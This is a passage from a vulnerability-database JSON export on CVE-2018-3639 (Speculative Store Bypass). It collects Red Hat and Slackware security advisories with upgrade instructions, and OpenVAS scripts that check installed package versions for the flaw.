privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nNote: This issue is present in hardware and cannot be fully fixed via software update. The updated kernel packages provide software side of the mitigation for this hardware issue. To be fully functional, up-to-date CPU microcode applied on the system is required. Please refer to References section for further information about this issue, CPU microcode requirements and the potential performance impact.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-05-29T20:01:41", "published": "2018-05-29T20:00:13", "id": "RHSA-2018:1640", "href": "https://access.redhat.com/errata/RHSA-2018:1640", "type": "redhat", "title": "(RHSA-2018:1640) Important: kernel security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "description": "KVM (Kernel-based Virtual Machine) is a full virtualization solution for\nLinux on a variety of architectures. The qemu-kvm-rhev packages provide the\nuser-space component for running virtual machines that use KVM in\nenvironments managed by Red Hat products.\n\nSecurity fix(es):\n* An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load & Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor's data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nAcknowledgements:\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center)\nand Jann Horn (Google Project Zero) for reporting this issue.\n\nNote: This is the qemu-kvm-rhev side of the CVE-2018-3639 mitigation that\nincludes support for guests running on hosts with AMD processors.\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.", "modified": "2018-08-07T18:12:26", "published": "2018-08-07T18:11:28", "id": "RHSA-2018:2364", "href": "https://access.redhat.com/errata/RHSA-2018:2364", "type": "redhat", "title": "(RHSA-2018:2364) Important: qemu-kvm-rhev security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:46:42", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nNote: This issue is present in hardware and cannot be fully fixed via software update. The updated kernel packages provide software side of the mitigation for this hardware issue. To be fully functional, up-to-date CPU microcode applied on the system is required. Please refer to References section for further information about this issue, CPU microcode requirements and the potential performance impact.\n\nIn this update mitigations for x86-64 architecture are provided.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-05-22T19:40:24", "published": "2018-05-22T19:35:23", "id": "RHSA-2018:1635", "href": "https://access.redhat.com/errata/RHSA-2018:1635", "type": "redhat", "title": "(RHSA-2018:1635) Important: kernel security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:46:08", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nNote: This issue is present in hardware and cannot be fully fixed via software update. The updated kernel packages provide software side of the mitigation for this hardware issue. To be fully functional, up-to-date CPU microcode applied on the system is required. Please refer to References section for further information about this issue, CPU microcode requirements and the potential performance impact.\n\nIn this update mitigations for x86 (both 32 and 64 bit) architecture are provided.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-05-29T18:04:58", "published": "2018-05-29T17:59:32", "id": "RHSA-2018:1638", "href": "https://access.redhat.com/errata/RHSA-2018:1638", "type": "redhat", "title": "(RHSA-2018:1638) Important: kernel security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "description": "The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the libvirt side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-10-30T17:46:44", "published": "2018-10-30T17:44:50", "id": "RHSA-2018:3400", "href": "https://access.redhat.com/errata/RHSA-2018:3400", "type": "redhat", "title": "(RHSA-2018:3400) Important: libvirt security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "description": "Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-10-30T17:55:24", "published": "2018-10-30T17:45:30", "id": "RHSA-2018:3401", "href": "https://access.redhat.com/errata/RHSA-2018:3401", "type": "redhat", "title": "(RHSA-2018:3401) Important: qemu-kvm security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:46:11", "bulletinFamily": "unix", "description": "The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the libvirt side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-10-30T17:01:45", "published": "2018-10-30T16:56:53", "id": "RHSA-2018:3398", "href": "https://access.redhat.com/errata/RHSA-2018:3398", "type": "redhat", "title": "(RHSA-2018:3398) Important: libvirt security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "slackware": [{"lastseen": "2019-05-30T07:37:15", "bulletinFamily": "unix", "description": "New kernel packages are available for Slackware 14.2 to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/linux-4.4.144/*: Upgraded.\n This kernel update enables additional mitigations for spectre_v2 (IBPB and\n IBRS_FW). It also enables reporting on the Speculative Store Bypass\n vulnerability (aka GPZ Variant 4) which affects Intel processors and must\n be patched with a microcode update.\n To see the status of CPU vulnerability mitigations on your system, look at\n the files in: /sys/devices/system/cpu/vulnerabilities\n In addition, these kernels enable SMB2. Here's the complete list of kernel\n config changes from the previous 4.4.132:\n -X86_DEBUG_STATIC_CPU_HAS n\n CIFS_SMB2 n -> y\n +CC_OPTIMIZE_FOR_PERFORMANCE y\n +CIFS_SMB311 n\n +X86_FAST_FEATURE_TESTS y\n Be sure to upgrade your initrd after upgrading the kernel packages.\n If you use lilo to boot your machine, be sure lilo.conf points to the correct\n kernel and initrd and run lilo as root to update the bootloader.\n If you use elilo to boot your machine, you should run eliloconfig to copy the\n kernel and initrd to the EFI System Partition.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.144/kernel-firmware-20180727_b01151b-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.144/kernel-generic-4.4.144-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.144/kernel-generic-smp-4.4.144_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.144/kernel-headers-4.4.144_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.144/kernel-huge-4.4.144-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.144/kernel-huge-smp-4.4.144_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.144/kernel-modules-4.4.144-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.144/kernel-modules-smp-4.4.144_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.144/kernel-source-4.4.144_smp-noarch-1.txz \n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.144/kernel-firmware-20180727_b01151b-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.144/kernel-generic-4.4.144-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.144/kernel-headers-4.4.144-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.144/kernel-huge-4.4.144-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.144/kernel-modules-4.4.144-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.144/kernel-source-4.4.144-noarch-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 packages:\n78b4734f9898dceb88c85e2428ecb229 kernel-firmware-20180727_b01151b-noarch-1.txz\nc6d60676defaf0aff665e16d9c2a7fb5 kernel-generic-4.4.144-i586-1.txz\ncd9e3723a06cbc3f836ceda50568ee20 kernel-generic-smp-4.4.144_smp-i686-1.txz\nb3c43f455774ddd33247759baab252aa kernel-headers-4.4.144_smp-x86-1.txz\ncc87a7baeb407f080011625435a7e268 kernel-huge-4.4.144-i586-1.txz\nf081add71fe7909a49bc84becccc29ee kernel-huge-smp-4.4.144_smp-i686-1.txz\n061a686e01ba27e94e67d0163f9fec7f kernel-modules-4.4.144-i586-1.txz\nd54f9e6eb5271d88bf80555f250cf742 kernel-modules-smp-4.4.144_smp-i686-1.txz\n526b09e6aa33987cc1067dbfb418e414 kernel-source-4.4.144_smp-noarch-1.txz\n\n\nSlackware x86_64 14.2 packages:\n78b4734f9898dceb88c85e2428ecb229 kernel-firmware-20180727_b01151b-noarch-1.txz\nad06c7a0fdada92f42ec52759fe4f037 kernel-generic-4.4.144-x86_64-1.txz\n411d9c7db2167177ee97a8f7cbf4366a kernel-headers-4.4.144-x86-1.txz\nf5176e27d85d80049532811423f8616b kernel-huge-4.4.144-x86_64-1.txz\n847b5f06e3cd0eccce0a93b98412ede6 kernel-modules-4.4.144-x86_64-1.txz\nf8efe4ac11ac27114291238fafd7c406 kernel-source-4.4.144-noarch-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg kernel-*.txz\n\nIf you are using an initrd, you'll need to rebuild it.\n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.144-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.144 | bash\n\nPlease note that "uniprocessor" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren't sure which\nkernel you are running, run "uname -a". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.144-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.144 as the version.\n\nIf you are using lilo or elilo to boot the machine, you'll need to ensure\nthat the machine is properly prepared before rebooting.\n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file. Either way,\nyou'll need to run "lilo" as root to reinstall the boot loader.\n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition.", "modified": "2018-07-27T14:57:40", "published": "2018-07-27T14:57:40", "id": "SSA-2018-208-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.721251", "title": "Slackware 14.2 kernel", "type": "slackware", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:33:25", "bulletinFamily": "scanner", "description": "Check the version of qemu-img", "modified": "2019-03-08T00:00:00", "published": "2018-05-23T00:00:00", "id": "OPENVAS:1361412562310882884", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882884", "title": "CentOS Update for qemu-img CESA-2018:1633 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1633_qemu-img_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for qemu-img CESA-2018:1633 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882884\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-23 05:40:32 +0200 (Wed, 23 May 2018)\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for qemu-img CESA-2018:1633 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of qemu-img\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Kernel-based Virtual Machine (KVM) is a full virtualization solution for\nLinux on a variety of architectures. The qemu-kvm packages provide the\nuser-space component for running virtual machines that use KVM.\n\nSecurity Fix(es):\n\n * An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load & Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor's data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\");\n script_tag(name:\"affected\", value:\"qemu-img on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1633\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-May/022842.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"qemu-img\", rpm:\"qemu-img~1.5.3~156.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qemu-kvm\", rpm:\"qemu-kvm~1.5.3~156.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qemu-kvm-common\", rpm:\"qemu-kvm-common~1.5.3~156.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qemu-kvm-tools\", rpm:\"qemu-kvm-tools~1.5.3~156.el7_5.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-15T14:37:11", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-08-14T00:00:00", "published": "2019-08-12T00:00:00", "id": "OPENVAS:1361412562310876661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876661", "title": "Fedora Update for java-1.8.0-openjdk FEDORA-2019-3854a1727e", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876661\");\n script_version(\"2019-08-14T07:16:43+0000\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-08-14 07:16:43 +0000 (Wed, 14 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-12 02:26:04 +0000 (Mon, 12 Aug 2019)\");\n script_name(\"Fedora Update for java-1.8.0-openjdk FEDORA-2019-3854a1727e\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-3854a1727e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQ677VTGDQVJQIOLDBEFJVWNFGICUGSX\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.8.0-openjdk'\n package(s) announced via the FEDORA-2019-3854a1727e advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The OpenJDK runtime environment 8.\");\n\n script_tag(name:\"affected\", value:\"'java-1.8.0-openjdk' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"java\", rpm:\"java~1.8.0~openjdk~1.8.0.222.b10~0.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:27", "bulletinFamily": "scanner", "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2018-05-23T00:00:00", "id": "OPENVAS:1361412562310882887", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882887", "title": "CentOS Update for kernel CESA-2018:1651 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1651_kernel_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for kernel CESA-2018:1651 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882887\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-23 05:40:42 +0200 (Wed, 23 May 2018)\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2018:1651 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es):\n\n * An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load & Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor's data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software side of the\nmitigation for this hardware issue. To be fully functional, up-to-date CPU\nmicrocode applied on the system is required. Please refer to References\nsection for further information about this issue, CPU microcode\nrequirements and the potential performance impact.\n\nIn this update mitigations for x86 (both 32 and 64 bit) architecture are\nprovided.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\n\nBug Fix(es):\n\n * Previously, an erroneous code in the x86 kexec system call path caused a\nmemory corruption. As a consequence, the system became unresponsive with\nthe following kernel stack trace:\n\n'WARNING: CPU: 13 PID: 36409 at lib/list_debug.c:59\n__list_del_entry+0xa1/0xd0 list_del corruption. prev- next should be\nffffdd03fddeeca0, but was (null)'\n\nThis update ensures that the code does not corrupt memory. As a result, the\noperating system no longer hangs. (BZ#1573176)\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1651\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-May/022835.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~696.30.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n 